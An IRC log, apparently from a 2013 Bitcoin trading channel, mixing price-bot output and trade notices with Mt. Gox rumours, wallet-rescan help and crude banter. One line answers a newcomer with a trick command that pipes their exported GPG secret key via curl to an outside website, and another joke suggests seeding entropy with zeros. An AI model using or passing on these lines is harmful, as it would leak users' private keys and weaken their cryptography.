[-] May 02 16:55:19 [BTCTC] [ASICMINER-PT] 3 @ 1.254 = 3.762 BTC [-] May 02 16:55:30 [BTCTC] [ASICMINER-PT] 2 @ 1.253 = 2.506 BTC [-] May 02 16:55:37 brownian motion May 02 16:55:48 [BTCTC] [BTC-BOND] 25 @ 0.010097 = 0.2524 BTC [+] May 02 16:55:51 [BTCTC] [ASICMINER-PT] 1 @ 1.252511 BTC [-] May 02 16:56:32 we are coming down because we went up too fast May 02 16:56:33 again May 02 16:56:33 definitly not the report but this... : http://blockchained.com/depth_mtgox_15d.png May 02 16:56:33 ;;ticker May 02 16:56:34 BTCUSD ticker | Best bid: 105.92701, Best ask: 106.00000, Bid-ask spread: 0.07299, Last trade: 106.00000, 24 hour volume: 210750.82541399, 24 hour low: 104.00000, 24 hour high: 130.99990, 24 hour vwap: 116.05280 May 02 16:56:41 nice May 02 16:56:52 [BTCTC] [BTC-BOND] 789 @ 0.010097 = 7.9665 BTC [+] May 02 16:57:09 [BTCTC] [BTC-BOND] 189 @ 0.010098 = 1.9085 BTC [+] May 02 16:57:14 actually there is more bad news out there than good May 02 16:57:14 [BTCTC] [BTC-BOND] 4 @ 0.01023 = 0.0409 BTC [+] May 02 16:57:23 [BTCTC] [BTC-BOND] 18 @ 0.01024 = 0.1843 BTC [+] May 02 16:57:26 99 please, the last one in btc history May 02 16:57:52 we need more reason to buy bitcoins but everyone is fucking up everywhere lol May 02 16:57:54 ;;goxdown May 02 16:57:54 Error: "goxdown" is not a valid command. May 02 16:57:57 i'm gonna go out on a limb and say 99 wont happen May 02 16:58:00 :/ May 02 16:58:58 order book can't lie :) 90 easy imo May 02 16:59:09 lol May 02 16:59:13 order book IS lies May 02 16:59:34 shuut, i need cheap coin May 02 17:01:39 so i have a back up wallet, made from satoshi client, now i installed it and i dont see my coins, but they are on the block chain, what do? May 02 17:02:17 [BTCTC] [BITVPS] 1 @ 0.00108 BTC [+] May 02 17:02:20 [BTCTC] [BITVPS] 124 @ 0.00107 = 0.1327 BTC [-] May 02 17:02:24 Chaang-Noi run with -rescan May 02 17:02:31 [BTCTC] [BITVPS] 10 @ 0.00105 = 0.0105 BTC [-] May 02 17:02:39 [BTCTC] [BITVPS] 39 @ 0.00101 = 0.0394 BTC [-] May 02 17:02:45 [BTCTC] [BITVPS] 26 @ 0.001 = 0.026 BTC [-] May 02 17:02:52 kako i thought so do so i went to the consol and it wont let me May 02 17:03:00 ?? May 02 17:03:12 what's "Wont let me" even mean May 02 17:03:18 lol May 02 17:03:35 21:03:27 May 02 17:03:36  May 02 17:03:36 Method not found (code -32601) May 02 17:03:49 or better yet, how do i "-rescan" May 02 17:03:56 cuz clearly im being dumb May 02 17:04:23 run bitcoind or -qt May 02 17:04:31 and pass -rescan as arg May 02 17:04:32 when you do May 02 17:04:33 -qt May 02 17:04:33 I definately think we will test 100 and prolly go through... not that much coin on the bid... May 02 17:04:40 im in -qt now May 02 17:04:55 what do you have there windows? May 02 17:05:16 and i typed nothing else but -rescan in consol May 02 17:05:20 jesus May 02 17:05:23 close the -qt May 02 17:05:34 and edit the shortcut you have May 02 17:05:38 to the -qt May 02 17:05:45 so it says " -rescan" May 02 17:05:48 on the end of the filepath May 02 17:05:59 and run May 02 17:06:13 jesus! May 02 17:07:21 what program should i use to edit it? May 02 17:07:31 yes im very new to linux May 02 17:07:54 ah your on linux May 02 17:07:56 new two week low... May 02 17:07:58 run it from console then May 02 17:08:22 /home/user/.bitcoin/ May 02 17:08:25 i see people moving up bids from 100 to 103 May 02 17:08:28 or .bitcoin-qt May 02 17:08:32 its inthere May 02 17:08:45 then add -rescan on the end May 02 17:08:59 ;;bids 100.5 May 02 17:08:59 There are currently 7838.7088 bitcoins demanded at or over 100.5 USD, worth 800450.060155 USD in total. | Data vintage: 106.3266 seconds May 02 17:09:55 no such file or directory :/ May 02 17:10:08 any idea why BTC E is more expensive than mtgox ? May 02 17:10:13 #Nasdaq says it is investigating potentially erroneous trade in $WST. Looks like 1 went thru at $103.80 40 secs after open v current $65.10. May 02 17:10:16 lmao. sucks for nasdaq May 02 17:10:34 Chaang-Noi May 02 17:10:36 pm May 02 17:10:59 cuz btc-e people dont wanna sell for less May 02 17:11:24 10$ spread 2 days ago May 02 17:11:38 ok cmon bounce! May 02 17:13:37 Holy shit May 02 17:13:52 mircea_popescu: when did the mtgox news hit? May 02 17:14:46 what news? May 02 17:14:54 pgp2 http://trilema.com/2013/any-questions/ May 02 17:15:48 gonna break 100 i guess May 02 17:15:50 ;;ticker May 02 17:15:53 BTCUSD ticker | Best bid: 99.99990, Best ask: 100.00000, Bid-ask spread: 0.00010, Last trade: 100.00000, 24 hour volume: 224841.25107748, 24 hour low: 100.36000, 24 hour high: 130.85000, 24 hour vwap: 115.23849 May 02 17:15:56 yep May 02 17:16:08 oh boy May 02 17:16:16 look out below! May 02 17:16:21 wtf May 02 17:16:35 ;;bids 0 May 02 17:16:35 There are currently 27359138 bitcoins demanded at or over 0.0 USD, worth 14657784.8124 USD in total. | Data vintage: 44.1781 seconds May 02 17:16:52 where r u bulls May 02 17:17:02 haha this is for real ? May 02 17:17:27 i guess we know tomorrow :D May 02 17:17:31 ;;ticker --last May 02 17:17:32 98.00000 May 02 17:17:35 oh god May 02 17:17:47 no real resistance until 90 May 02 17:17:59 pgp2: hello! May 02 17:18:06 mtgox is fucked what the fuck do you people expect May 02 17:18:16 lol mircea_popescu warned us BUT NO ONE LISTENS May 02 17:18:30 That japanese cop is reading a book about wine May 02 17:18:35 LOL May 02 17:18:48 or saki May 02 17:18:50 [MPEX] [O.USD.P098T] 1000 @ 0.3659749 = 365.9749 BTC [+] May 02 17:18:51 Bugpowder i thought it was a fromthing May 02 17:19:02 oh, the catch is in the "ireport." part May 02 17:19:05 By BitCoinSachs | Posted 2013-5-1 下午4:22 May 02 17:19:07 [MPEX] [O.USD.P101T] 1000 @ 0.39552257 = 395.5226 BTC May 02 17:19:11 this is the catch May 02 17:19:26 mircea_popescu: http://imgur.com/fjUQX92 May 02 17:19:41 [MPEX] [O.USD.P104T] 716 @ 0.42595915 = 304.9868 BTC May 02 17:19:49 heh. May 02 17:20:25 $vwap May 02 17:20:28 ThickAsThieves: http://pastebin.com/raw.php?i=xqLN3hus May 02 17:20:34 FINRA has determined to cancel all trades in security West Pharmaceutical Services, Inc. (WST) at or above $69.59 May 02 17:20:36 $avg May 02 17:20:37 ThickAsThieves: 115.30 May 02 17:20:42 ;) May 02 17:20:44 Mt. Gox bitcoin exchange may be responsible for the DDoS attacks May 02 17:20:49 dude this is ridiculous May 02 17:20:57 MJR_ https://twitter.com/Mircea_Popescu/status/329962754540720128 May 02 17:22:05 unbelieveable May 02 17:22:45 ;;ticker May 02 17:22:46 BTCUSD ticker | Best bid: 96.21000, Best ask: 96.59033, Bid-ask spread: 0.38033, Last trade: 96.21000, 24 hour volume: 230568.96532113, 24 hour low: 97.00000, 24 hour high: 130.85000, 24 hour vwap: 114.82734 May 02 17:22:55 either it's fake and will be excellent buying oportunity or it's true and BTC will go to 30 May 02 17:22:57 or less May 02 17:23:31 pgp2 what are you referring to? May 02 17:23:45 pgp2 indeed. May 02 17:24:03 it can still be fake and go to 30 May 02 17:24:05 huehue May 02 17:24:54 ThickAsTheives; the ireport article May 02 17:25:07 you think this dip is cuz of that? May 02 17:25:09 ireport = sea of trolls May 02 17:25:15 take it for what it is May 02 17:25:34 even the blind bat hits a pole once in a while May 02 17:25:57 indeed they do... May 02 17:26:06 [Hiring/Intern] Asset Issuer, News Information Manager, Securities Analyst May 02 17:26:09 usagi is hireing May 02 17:27:18 paying in silver shares? May 02 17:27:33 paying (already sold) silver shares? May 02 17:28:13 ;;ticker May 02 17:28:14 BTCUSD ticker | Best bid: 104.00000, Best ask: 104.93269, Bid-ask spread: 0.93269, Last trade: 104.93269, 24 hour volume: 237138.69054080, 24 hour low: 96.21000, 24 hour high: 130.85000, 24 hour vwap: 114.35572 May 02 17:29:01 well paying may be a little iffy May 02 17:29:05 but the hiring part is solid May 02 17:29:11 May 02 17:33:48 what is ireport? May 02 17:33:58 random "do it yourself" cnn pagwe May 02 17:34:31 link to article? May 02 17:35:25 http://ireport.cnn.com/docs/DOC-957375 May 02 17:37:07 ... May 02 17:37:11 am i missing something? May 02 17:37:19 no May 02 17:37:28 cashout before tmrw ! May 02 17:37:31 either the situation is exactly as is now...or it goes up May 02 17:43:56 ;;bids 50 May 02 17:43:59 There are currently 127125.24 bitcoins demanded at or over 50.0 USD, worth 8980307.51995 USD in total. | Data vintage: 0.0060 seconds May 02 17:44:17 ;;asks 150 May 02 17:44:17 There are currently 55216.295 bitcoins offered at or under 150.0 USD, worth 7421517.62196 USD in total. | Data vintage: 18.2228 seconds May 02 17:44:58 well no. May 02 17:45:09 either it's exactly as now, or it goes up, or it goes down May 02 17:51:49 http://highscalability.com/blog/2013/5/1/myth-eric-brewer-on-why-banks-are-base-not-acid-availability.html May 02 17:55:23 jcpham yup May 02 17:55:32 advanced stuff, but basically right. May 02 17:56:19 too bad that's talking about ATMs May 02 17:58:16 i like to apply concepts May 02 17:58:19 banks do have central DBs. and surprise surprise they are not eventually consistent May 02 17:58:21 but yes atms are boring May 02 17:58:26 why did he take the article down :p May 02 17:58:54 Scrat it was more a historical look, which is accurate, and an in principle review, which also is accurate May 02 17:59:02 hence why "reconcile" is a term of art in finance. May 02 18:00:36 I guess you can call a system like ACH eventually consistent May 02 18:01:01 is bitcoin the national currency of zimbabwe for real? May 02 18:01:05 i feel megatrolled May 02 18:02:11 megatrolled... yes... May 02 18:02:29 That's the new eveil main character from the new Transformers movie May 02 18:02:31 http://ireport.cnn.com/docs/DOC-966426 May 02 18:02:38 MegaTron vs MegaTroll May 02 18:04:41 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [+] May 02 18:04:46 mircea_popescu: my only point was that whether zimbabwe switches to bitcoin or not, neither outcome in my mind is "bad" news May 02 18:04:53 so why would people sell? May 02 18:04:59 ;;ticker May 02 18:05:00 BTCUSD ticker | Best bid: 94.00000, Best ask: 96.00000, Bid-ask spread: 2.00000, Last trade: 94.00000, 24 hour volume: 247208.59898683, 24 hour low: 96.21000, 24 hour high: 130.60000, 24 hour vwap: 113.40334 May 02 18:05:11 also, the camwhore is amazing May 02 18:05:15 great trader i guess May 02 18:06:04 why does cnn whore out its name and reputation like that? May 02 18:06:33 cnn is a whorish network May 02 18:06:53 ;;ticker May 02 18:06:54 BTCUSD ticker | Best bid: 95.00000, Best ask: 95.18595, Bid-ask spread: 0.18595, Last trade: 95.18595, 24 hour volume: 250934.34771713, 24 hour low: 94.00000, 24 hour high: 130.55000, 24 hour vwap: 113.12523 May 02 18:06:57 you should see the clip from the boston bombing where wolf blitzer keeps saying "cnn is bringing this to you exclusively" May 02 18:07:02 and they were wrong May 02 18:07:11 how sick May 02 18:07:14 "we are the only ones reporting this!" May 02 18:07:17 CNN has managed to be worse than Fox May 02 18:07:23 which is hard to do May 02 18:07:29 now its all just a bunch of gimmicks May 02 18:07:36 look at our touch screen panel May 02 18:07:46 fuck that, i like journalism, read al jazeera May 02 18:07:52 I don't live in the US, so I sometimes can't even begin to imagine what it's like May 02 18:07:56 the news May 02 18:07:56 even russia today is better May 02 18:08:13 last times I watched tv in states it seemed unreal to me May 02 18:08:40 I cannot imagine being constantly in such a blizzard of shit May 02 18:08:46 yah May 02 18:08:49 no offence :) May 02 18:09:07 and now...sometimes i go to a site and they will say "we don't accept customers from your country" May 02 18:09:09 we're just a little behind here May 02 18:09:16 :( second class citizens May 02 18:09:32 you are not allowed to watch this video in your country May 02 18:09:35 93 May 02 18:09:36 yeah May 02 18:09:40 MJR_ the post is about mtgox tho May 02 18:09:43 thank god for ssh tunnels and proxying May 02 18:09:58 zimbabwe accepting bitcoins is about mt gox? May 02 18:10:09 dude. http://trilema.com/2013/any-questions/ May 02 18:10:14 that is your referwence. click the links. May 02 18:10:28 AHA May 02 18:10:41 someone gave me the wrong link May 02 18:10:47 i knew i was missing something May 02 18:11:07 aanyway. fox news actually owned on the viewer cards for the bombing. May 02 18:11:09 it's taking over. May 02 18:11:17 91 May 02 18:11:57 fox news makes me sad May 02 18:12:53 The movie idiocracy seems like a prophecy May 02 18:13:56 Want some big ass fries with that? May 02 18:14:37 EXTRA big ass friees :) May 02 18:14:46 yeah is idiocracy the opposite of meritocracy? May 02 18:15:07 the reign of the stupid vs the reign of those who have proven themselves May 02 18:15:17 lets check wordnet May 02 18:15:31 @nntaleb 1h If someone you never met calls you "arrogant", it means he can't find anything else. Otherwise he would have said "wrong". Heuristic #81 May 02 18:15:37 gotta love taleb. im keeping this one. May 02 18:16:07 bleh meritocracy has no antonym there May 02 18:18:28 allow me to interrupt for the gamer chick : http://polimedia.us/dtng/c/src/136750785890.jpg May 02 18:20:18 damn it May 02 18:21:31 there goes my last bit of cocnentration I had May 02 18:22:20 you had cock netration ? May 02 18:22:37 see what you did May 02 18:22:39 This is bitcoin, i belive he was missing ! high: 130.00 low: 91.11 55s lag May 02 18:22:53 mircea_popescu: nice management book May 02 18:24:51 and suddenly it went quieet May 02 18:26:22 [BTCTC] [ASICMINER-PT] 1 @ 1.27 BTC [-] May 02 18:27:07 How much disk space would I Need on a virtual machine dedicated to all things bitcoin? 25gb enough? May 02 18:27:35 should do for a while May 02 18:27:43 Depends on what operating system as well May 02 18:27:48 Ubuntu May 02 18:27:50 windows you want to start at 25 May 02 18:28:28 That will be pleanty of space then May 02 18:28:34 Thanks. May 02 18:44:25 tk993 the bitcoin blockchain is about 10gb atm and probably grow 10ish gb a year May 02 18:48:49 http://trilema.com/2013/mpex-one-year-of-dividends/ << in case anyone missed it last time. May 02 18:52:55 [BTCTC] [GSDPT] 10 @ 0.00332 = 0.0332 BTC [-] May 02 18:55:48 "AMC is a business unit of VMC" May 02 18:55:54 great, now who the hell is VMC? May 02 18:56:28 same people May 02 18:56:35 (person) May 02 18:59:04 that's my point May 02 18:59:15 and then we have these people: https://bitcointalk.org/index.php?topic=99497.msg2006028#msg2006028 May 02 19:00:13 imsaguy the usagi method. May 02 19:00:19 it worked in the past, neh ? May 02 19:02:23 profit is boring 1:1 repayment May 02 19:05:53 that furuknap guy is the same one that thinks I should run TAT.ASICMINER with no mgmt fee May 02 19:06:15 well, he said something like .5% if divs at most May 02 19:06:21 I can see certain instances where someone would expect someone to not take a management fee May 02 19:06:23 of May 02 19:06:30 say when they get a board seat that they normally wouldn't have May 02 19:06:48 i don't see any case when anyone should do anything for free. May 02 19:07:09 getting the board seat is the perk, not every payment is in currency May 02 19:07:11 anyway, sent the girl on the asicminer dood May 02 19:07:14 you should know that May 02 19:07:22 board seat is arguably valuable, and i have already stated any tangible board seat benefits would be split w shareholders May 02 19:07:25 imsaguy maybe like that, tho it's always best to take a clear payment than an unclear one May 02 19:07:40 getting a board seat is pretty clear ;-) May 02 19:07:48 specify in the contract May 02 19:07:52 it isn't rocket science May 02 19:08:01 it is in the contract May 02 19:08:13 imsaguy it's value tho, how much btc ? May 02 19:08:33 Not everything has an easily calculated value May 02 19:08:42 for example, calculate the value of girl's life. May 02 19:08:57 surely he could come up with a minimum value May 02 19:09:07 starting at least with what he pays her May 02 19:09:10 to do her job May 02 19:09:13 At the very least, the opportunity for insider trading May 02 19:09:13 " Roll out the Red Carpet! You received 1 reply from a celebrity! Amazing! " << this klout thing is retarded. May 02 19:09:24 lol May 02 19:09:35 i played with klout a year or two ago May 02 19:09:43 imsaguy so what, not like i'm payhing anyone in girl lives. May 02 19:09:52 total social media meta gaming to get you to social media more May 02 19:09:58 hey deadterra May 02 19:10:02 question for you when you're here May 02 19:10:10 ThickAsThieves yup absolutely. May 02 19:11:13 ;;ticker May 02 19:11:13 BTCUSD ticker | Best bid: 93.11000, Best ask: 94.00000, Bid-ask spread: 0.89000, Last trade: 94.00000, 24 hour volume: 274284.18541062, 24 hour low: 91.11000, 24 hour high: 129.75000, 24 hour vwap: 111.37083 May 02 19:11:42 Namworld's gox alarm has been useful this week :) May 02 19:12:13 le 90s May 02 19:12:16 for reference http://namcdn.com/btcalarm/ May 02 19:13:37 heh May 02 19:14:15 down to $91 May 02 19:14:38 ;;ticker May 02 19:14:39 BTCUSD ticker | Best bid: 92.00000, Best ask: 92.50000, Bid-ask spread: 0.50000, Last trade: 92.00000, 24 hour volume: 274284.18541062, 24 hour low: 91.11000, 24 hour high: 129.75000, 24 hour vwap: 111.37083 May 02 19:14:51 next stop 85 May 02 19:14:59 then maybe more panic and 80 May 02 19:15:16 then keep your eye on that mega manipulation floor at 70 May 02 19:15:24 if that disappears... May 02 19:17:31 imsaguy, DT is here ^ May 02 19:17:40 w00t May 02 19:17:51 ThickAsThieves, the client is May 02 19:17:58 don't know if DT is actively at the computer May 02 19:18:18 could also be a ghost May 02 19:23:28 [BTCTC] [ASICMINER-PT] 4 @ 1.255 = 5.02 BTC [-] May 02 19:24:32 https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/554005_150909505084169_1700868551_n.jpg May 02 19:29:31 ;;ud palin May 02 19:29:32 http://www.urbandictionary.com/define.php?term=sarah%20palin | name='Description' property='og:description'> ;;ticker May 02 19:29:41 BTCUSD ticker | Best bid: 96.01000, Best ask: 96.21999, Bid-ask spread: 0.20999, Last trade: 96.01000, 24 hour volume: 274720.80247070, 24 hour low: 91.11000, 24 hour high: 128.00000, 24 hour vwap: 110.65029 May 02 19:29:50 ;;later tell pgp just testing May 02 19:29:51 The operation succeeded. May 02 19:40:18 [BTCTC] [ASICMINER-PT] 1 @ 1.279 BTC [+] May 02 19:40:24 [BTCTC] [ASICMINER-PT] 2 @ 1.28 = 2.56 BTC [+] May 02 19:44:57 Is there a way to view my private PGP key? Is there a reason to or is it just stored somewhere on the computer... mainly I want to make sure I exported my public key properly. May 02 19:45:20 gpg -a --export-secret-key May 02 19:46:02 Thanks. May 02 19:46:29 make sure however May 02 19:46:32 you don't compromise it. May 02 19:47:05 Header is private key block. for the other it is public key block? Are they different structures or how does it know? Or does it just know? Say for example I sent my public key and kept the headers of the private key... does that not matter because all the information is in the string of characters? May 02 19:47:44 you could reverse them if you wanted May 02 19:47:47 gpg -a --export-secret-key | curl -X POST https://paymium.com/ <-- encrypts your key even more securely May 02 19:48:00 scam. May 02 19:48:05 lol May 02 19:48:31 whats up davout May 02 19:48:48 http://www.foxbusiness.com/industries/2013/05/02/ing-us-kicks-off-2nd-biggest-ipo-13-in-red/?cmpid=cmty_twitter_fb May 02 19:48:53 they should have used mpex. May 02 19:48:54 mjr_1: nothing much, chilling, having a brew, getting haxxed May 02 19:49:00 in the butt May 02 19:49:15 using mpex in the butt, i wouldn't recommend it to friends May 02 19:49:30 nono, you getting hacked in the butt May 02 19:49:39 i don't recommend it May 02 19:49:53 yep, and likewise i wouldn't recommend it to friends May 02 19:50:02 would you allow a non-bitcoin based business to ipo on mpex? May 02 19:50:20 ? May 02 19:50:30 makomk malaimo metabyte midnightmagic mircea_popescu MJR_ mjr_1 mjr___ mod6 mpexbot May 02 19:50:38 obviously they would raise bitcoins, but could convert to dollars May 02 19:50:47 mjr_1 i think ing is in a position to ask me to make any exception it wants. May 02 19:50:55 hehehe May 02 19:51:03 voya, right? May 02 19:51:27 voyacoin May 02 19:52:58 o also davout ? http://trilema.com/2013/internet-story/ May 02 19:53:00 suffer. May 02 19:53:08 Use existing demo practice patients to demonstrate Canadian content/results (TBD...Matt to decide if we want to add a Canadian patient) May 02 19:53:11 Add logic to display Canadian content based on the URL May 02 19:53:13 if demo.vetconnectplus.com display US-English content May 02 19:53:16 US footer, phone numbers, email addresses, numeric codes in the patient list, etc May 02 19:53:19 if demo.vetconnectplus.ca display CA-English content May 02 19:53:21 lol hi mr mischan May 02 19:53:21 god damn docking station May 02 19:53:22 sorryh folkds May 02 19:53:36 docking station switches my mouse buttons May 02 19:53:44 in the butt ? May 02 19:54:24 http://ireport.cnn.com/docs/DOC-966926 May 02 19:54:25 moar news. May 02 19:55:36 ridiculous story May 02 19:56:22 no, because bitcoin. May 02 19:57:13 hello May 02 19:57:43 hi May 02 20:01:10 mircea_popescu: nice tits! May 02 20:01:20 kinda small May 02 20:01:56 mircea_popescu: is that what she said? May 02 20:02:09 hehe nah May 02 20:02:41 speaking of which, when are you back online ? May 02 20:02:46 hackers are getting bored. May 02 20:02:56 haha fuck off May 02 20:03:34 there's like... new ruby 0days and whatnot, nowhere to use them May 02 20:03:45 well, coinbase May 02 20:03:49 bitfinex May 02 20:03:53 take your pîck May 02 20:04:46 coinbase still egzists ?! May 02 20:06:54 we're trying to get xavier niel to make us some colocated space in his not-yet-opened atomic-bunker data center May 02 20:07:49 better yet, give him shares May 02 20:07:54 a wait, you're not listed. nm. May 02 20:08:14 he's already in line to chip in for our next round :) May 02 20:08:37 so CNN iReport seems to be as accurate as CNN May 02 20:08:41 a that's a good idea then May 02 20:09:31 probably the shortest successful investor pitch ever made May 02 20:10:00 oh hey May 02 20:10:01 https://bitcointalk.org/index.php?topic=99497.msg2006597#msg2006597 May 02 20:10:07 2mn ?! wow. May 02 20:10:09 it seems AM is finally hitting their original target hashrate May 02 20:10:13 only 2 months late May 02 20:10:31 now they can hit their next goal of triple the original May 02 20:10:35 ::eyeroll: May 02 20:10:53 imsaguy when was it originally supposed to be 12th, march ? May 02 20:12:25 ;;ticker May 02 20:12:25 BTCUSD ticker | Best bid: 101.09942, Best ask: 102.40143, Bid-ask spread: 1.30201, Last trade: 103.15638, 24 hour volume: 286019.66613392, 24 hour low: 91.11000, 24 hour high: 127.00987, 24 hour vwap: 109.79778 May 02 20:13:06 mircea_popescu, to be honest, I don't remember the exact date at this point May 02 20:13:20 me either May 02 20:13:27 mircea_popescu, I'm surprised your girl passed on this one: https://bitcointalk.org/index.php?topic=99497.msg2006541#msg2006541 May 02 20:13:34 fucking hell with these people, everyone thinks it's funny to keep changing specs promises etc May 02 20:13:53 imsaguy https://bitcointalk.org/index.php?topic=99497.msg2006867#msg2006867 ? May 02 20:14:00 mircea_popescu: there are no means to enforcing May 02 20:14:02 well, there are May 02 20:14:09 but nobody has taken it upon themselves to try May 02 20:14:25 ;;google gpg contracts May 02 20:14:27 GPG contracts pe Trilema - Un blog de Mircea Popescu.: ; GPG/PGP Basics - A.P. Lawrence SCO Unix Consultant: ; [Announce] GnuPG 1.4.13 released - GnuPG and GNUTLS Mailing List ...: May 02 20:14:33 4 and a half years for insider trading \ May 02 20:14:45 mircea_popescu: your latest link was for a quote from a different user May 02 20:14:57 earlier in the thread than the one I linked to May 02 20:14:58 oh well May 02 20:15:10 uya well apparently even her can't keep uo with the idiocy May 02 20:15:22 I'm done trolling it May 02 20:15:27 lol he made 72 million, got fined 4 million May 02 20:15:30 its like goign into a church and trying to have a conversation May 02 20:15:36 [BTCTC] [ASICMINER-PT] 1 @ 1.279 BTC [-] May 02 20:15:39 "I'm truly glad you focus on red herrings, so why don't we make this discussion about accounting instead, then?" May 02 20:15:43 red herring don't you know. May 02 20:15:45 mjr_1: he also paid 4.5 years of his life May 02 20:15:47 i tell you education is fucking perverse. May 02 20:16:03 they keep teaching the peasants how to write, end result is the fucking internet. May 02 20:16:03 is 4.5 years of your life worth 68M? May 02 20:16:20 education should be either all the way or not at all. enough of this "literate but still clueless" bs. May 02 20:16:36 lol, and depends on "to who" May 02 20:16:56 imsaguy mpoe only took 1.5 and is like 100 or w/e May 02 20:17:03 to me...i think i would go to jail for 4.5 years for 68 million, maybe May 02 20:17:10 mircea_popescu: simple but he has a point: https://bitcointalk.org/index.php?topic=99497.msg2006958#msg2006958 May 02 20:17:33 4.5 of surprise butsecks? not even for 21M BTC May 02 20:17:59 why are you such a faghater. May 02 20:18:07 isn't that illegal in teh republique ? May 02 20:18:28 lol May 02 20:18:33 lol no May 02 20:18:40 [BTCTC] [PAJKA.BOND] 16 @ 0.1064 = 1.7024 BTC [+] May 02 20:18:48 mircea_popescu: since when do you have to be fag to enjoy butsecks? May 02 20:19:09 true May 02 20:19:13 because I know a bunch of girl fags May 02 20:19:15 poofter May 02 20:19:27 #bitcoin-anal is the place May 02 20:19:34 imsaguy true that. i enjoy butt seks all the time, in the butt wrapped around my hard cock sense of the term May 02 20:21:11 truff1es, is it? May 02 20:21:15 http://www.bbc.co.uk/news/technology-22380603 wow May 02 20:22:09 $3700! May 02 20:22:16 kinda yest news May 02 20:22:18 ;;ticker May 02 20:22:18 BTCUSD ticker | Best bid: 101.97671, Best ask: 102.85000, Bid-ask spread: 0.87329, Last trade: 102.85000, 24 hour volume: 287472.57675907, 24 hour low: 91.11000, 24 hour high: 126.90000, 24 hour vwap: 109.62469 May 02 20:23:39 they wanted to add bitcoin mining as a feature? May 02 20:23:41 sure May 02 20:23:53 the amount of lieing about that shit is astounding. May 02 20:24:10 sounds more like, oh we kinda got caught, so lets kinda admit it May 02 20:24:49 maybe theyll also cure cancer May 02 20:24:51 saints May 02 20:26:29 imsaguy https://bitcointalk.org/index.php?topic=192661.msg2006845#msg2006845 May 02 20:26:31 there. May 02 20:26:54 ThickAsThieves first it was just a day, then a week, then a tester w/o authorisation etc May 02 20:27:10 unauthorized getworks! May 02 20:27:27 cause you know they weren't using stratum May 02 20:29:06 mircea_popescu: I give it a 5 on a 10 scale May 02 20:29:12 pff May 02 20:29:17 show me you doing better May 02 20:29:18 she repeats too much May 02 20:29:25 its like listening to an american pop song May 02 20:29:26 because she is talking to idiots. May 02 20:29:31 EXACTLY May 02 20:32:30 [BTCTC] [ASICMINER-PT] 1 @ 1.2795 BTC [+] May 02 20:33:26 whatever, idiot May 02 20:34:00 nou May 02 20:37:10 anyone know exactly how keypoolrefill works ? May 02 20:38:30 you have a pool of pregenerated, but nto displayed addresses maintained by bitcoind May 02 20:38:43 yes but i mean cryptographically. May 02 20:38:52 is there a limit to the size of the pool that you can refill safely ? May 02 20:38:57 psh May 02 20:39:02 some people keep pools of thousands May 02 20:39:02 how exactly does it use the entropy or wtf does it do ? May 02 20:39:33 ask in -dev? May 02 20:39:46 or were you banned there too? May 02 20:39:47 it pregenerates the addies, so it eats entropy when you refill the pool May 02 20:39:50 banned ? May 02 20:39:51 imsaguy: lol May 02 20:39:55 im notp banned anywhere wtf. May 02 20:40:22 davout what's the largest pool you ever refilled ? May 02 20:40:30 [MPEX] [S.MPOE] 3482 @ 0.00071946 = 2.5052 BTC [+] May 02 20:40:32 [MPEX] [S.MPOE] 418 @ 0.00072562 = 0.3033 BTC [+] May 02 20:40:44 i usually have a 10k pool May 02 20:40:50 [BTCTC] [PAJKA.BOND] 21 @ 0.1064 = 2.2344 BTC [+] May 02 20:40:57 on user-facing services May 02 20:41:00 [BTCTC] [PAJKA.BOND] 1 @ 0.107395 BTC [+] May 02 20:41:02 s/have/had/ May 02 20:41:03 did you run strength analysis on the keys or any soprt of cryptographic validation ? May 02 20:41:11 [BTCTC] [PAJKA.BOND] 4 @ 0.107397 = 0.4296 BTC [+] May 02 20:41:13 no May 02 20:41:20 [BTCTC] [PAJKA.BOND] 3 @ 0.108999 = 0.327 BTC [+] May 02 20:41:24 my main concern is that the code is probably shit and we'll end up with weak keys towards the end May 02 20:41:25 [BTCTC] [PAJKA.BOND] 2 @ 0.109 = 0.218 BTC [+] May 02 20:41:30 fuck, "the end" may be anything over 6 May 02 20:41:35 [BTCTC] [PAJKA.BOND] 50 @ 0.109 = 5.45 BTC [+] May 02 20:41:44 [BTCTC] [PAJKA.BOND] 8 @ 0.109996 = 0.88 BTC [+] May 02 20:41:49 [BTCTC] [PAJKA.BOND] 22 @ 0.109997 = 2.4199 BTC [+] May 02 20:41:53 [BTCTC] [PAJKA.BOND] 139 @ 0.109998 = 15.2897 BTC [+] May 02 20:42:03 well, i don't know the code very well, but i think the address generation part probably relies on openssl May 02 20:42:09 which should behave fine May 02 20:42:32 i think that is correct May 02 20:43:01 o, it's openssl ? May 02 20:43:14 blessfully iirc that has no secret OPENSSL_CONFIG files needed. May 02 20:43:19 otherwise we'd be in deep shit huh. May 02 20:43:39 parts are based on openssl May 02 20:43:52 but if you try to plug it into openssl, they fail May 02 20:44:11 if we don't have a proper spec by 1.0 i'm out :-) May 02 20:44:37 i'll switch to SpecCoin May 02 20:45:33 davout there's no dispute that the neckbeard collective is going away. May 02 20:45:40 davout: it does, it never blocks and it is also seeded from /dev/urandom (which never blocks too) May 02 20:45:40 so i wouldn't be too worried about that part. May 02 20:45:45 there isnt? May 02 20:46:01 a specification ? May 02 20:46:17 meh i guess i have to have this part read. May 02 20:46:17 that would allow one to build a fully validating implementation ? nope May 02 20:46:18 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [+] May 02 20:46:34 because "it's complicated" May 02 20:46:52 because "oh, but some of openssl's bugs are now relied upon as features" May 02 20:47:04 pssshh May 02 20:47:44 [BTCTC] [ASICMINER-PT] 1 @ 1.2795 BTC [+] May 02 20:47:57 FEATURES!!!!!!!!!!!!!!!!!! May 02 20:48:02 lol May 02 20:49:49 /dev/urandom uses sha1, if someone can preimage sha1 at will you're in deep doodoo May 02 20:50:03 sort of like the people who made gambling machines who used the mersenne twister May 02 20:50:05 whenever my entropy pool is empty, I just pipe in 0 May 02 20:50:07 which* May 02 20:50:08 its just as good May 02 20:50:13 hm May 02 20:50:32 nobody would ever suspect 0 as a RNG seed. May 02 20:51:01 i bet your passphrase is G0d May 02 20:51:47 nope May 02 20:51:49 preimages are hard. even on md5 May 02 20:51:50 42 May 02 20:52:54 collisions are quadratically easier but useless for predicting future prng output May 02 20:54:17 IANAC (iana cryptographer) May 02 20:54:21 [BTCTC] [B.YABMC] 10 @ 0.014 = 0.14 BTC [-] May 02 20:59:31 [BTCTC] [PAJKA.BOND] 7 @ 0.1066 = 0.7462 BTC [-] May 02 20:59:36 [MPEX] 